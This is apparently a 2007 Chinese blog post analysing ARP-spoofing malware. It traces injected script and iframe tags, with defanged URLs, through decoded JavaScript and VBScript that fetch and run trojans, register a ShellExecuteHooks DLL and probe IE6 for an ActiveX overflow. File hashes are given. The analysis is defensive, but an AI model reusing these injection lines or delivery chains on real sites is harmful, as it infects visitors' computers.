ARP病毒加入的网址传播 Trojan.PSW.Win32.OnlineGames,Trojan.DL.Win32.Agent.xaa
endurer 原创
2007-08-28 第1版
昨天单位又有电脑中了ARP病毒,打开任一网页时,Kaspersky 总报告已检测到: 木马程序 Trojan-Downloader.JS.Psyme.kf。
中午因为帮网友检修电脑(见: 遭遇一堆 Trojan.PSW.Win32.OnlineGames / *door0.dll等1 ),未能进行分析。
现在解析一下。
查看网页代码,发现首部被加入:
/---
<script src=hxxp://*67.1*9.116.188/n**.js></script <script language="javascript" src="hxxp://v*.9**1t*g.net/k*.js"></script>
---/
hxxp://*67.1*9.116.188/n**.js 的内容为 eval() 执行自定义函数。经过3次解密得到原始代码,功能是输出代码:
/---
<script src="hxxp://o*raN.3**168*a*.com/s368/NEwJs2.js"></script>
<iframe width=0 height=0 src="hxxp://o*raN.3**168*a*.com/s368/t368.htm"></iframe>
<iframe width=0 height=0 src="hxxp://o*raN.3**168*a*.com/s368/t368.gif"></iframe>
---/
hxxp://o*raN.3**168*a*.com/s368/NEwJs2.js 内容为:
/---
StrInfo="/x3C/x73/…(略)…/x70/x74/x3E"
document.write(StrInfo);
---/
经过2次解密得到得到原始代码,功能是下载 S368.exe,保存到 %windir%中,文件名由自定义函数GnMs(n)生成,格式为~Temp****.tmp,其中 * 为数字,再调用 cmd.exe /c 启动。
文件说明符 : D:/test/S368.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-27 14:42:58
修改时间 : 2007-8-27 14:43:0
访问时间 : 2007-8-27 0:0:0
大小 : 22575 字节 22.47 KB
MD5 : 3c5c397b83b4377ac4a8c1e60f84af81
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.aqq
| 主 题: | 病毒上报邮件分析结果-流水单号:20070827145718842307 | ||
| 发件人: | "" <send@rising.net.cn> | 发送时间:2007.08.27 15:11 | |
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:S368.exe
病毒名:Trojan.PSW.Win32.OnlineGames.xyz
您所上报的病毒文件将在19.38.02版本中处理解决。
hxxp://o*raN.3**168*a*.com/s368/t368.htm 内容为 javascript 代码,经过2次解密,得到原始代码,开始部分为:
/---
<script language=javascript>fN56=8139;function _nr(){return true}onerror=_nr;dA15=9282;;_licensed_to_="huyufeng";</script><script src="important.js"></script>
---/
其中important.js 封装了控制thunder_server任务的代码,如开始(分类)全部任务,暂停(分类)全部任务,删除(分类)全部任务,还原(分类)全部任务等。
接下来的代码则是创建并利用thunder_server下载 S368.scr 到 c:/。
S368.scr 与 S368.exe 相同。
hxxp://o*raN.3**168*a*.com/s368/t368.gif 内容为 javascript 代码,经解密得到原始代码,开始部分为:
/---
<script language=javascript>gW91=3841;function _nr(){return true}onerror=_nr;fK51=4984;;_licensed_to_="huyufeng";</script>
---/
接下来的代码则判断 Windows 和 IE 版本,如果使用的是 WinXP、IE6,则输出代码:
/---
<iframe height=0 width=0 src=/"t368ok.gif/"><//iframe>
---/
hxxp://o*raN.3**168*a*.com/s368/t368ok.gif 内容为 javascript 代码,经解密得到原始代码,开始部分为:
/---
<script language=javascript>hA57=933;function _nr(){return true}onerror=_nr;gN17=2076;;_licensed_to_="huyufeng";</script><object classid="clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266" id='target'></object>
---/
接下来好像是利用溢出漏洞的代码,有时间再好好看看。
hxxp://v*.9**1t*g.net/k*.js 检查名为Cookie1的cookies是否存在,不则在则创建,并输出代码:
/---
<SCRIPT LANGUAGE="javascript1.2" SRC="hxxp://v*.9**1t*g.net/t.js"></SCRIPT>
---/
hxxp://v*.9**1t*g.net/t.js 功能是输出 escape加密的数据,解密后的数据为 vbscript 脚本代码,功能是 使用自定义函数LeoFunc() 解密数据 并 Execute,解密后数据为vbscript 脚本代码,其中部分数据仍使用自定义函数LeoFunc() 加密,功能是 下载 w.dll,保存到 %windir%,文件名为 Winhelp.dll,修改注册表进行注册,CLSID为 {6B3FCDC8-E5C7-477a-817E-72865A7758AE},并写入ShellExecuteHooks键下。
文件说明符 : D:/test/w.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-27 14:45:2
修改时间 : 2007-8-27 14:45:4
访问时间 : 2007-8-27 0:0:0
大小 : 7680 字节 7.512 KB
MD5 : 28e9c359886f7178931b3facc57e5dfa
Kaspersky 报为 Trojan-Downloader.Win32.Agent.bgk,瑞星 报为 Trojan.DL.Win32.Agent.xaa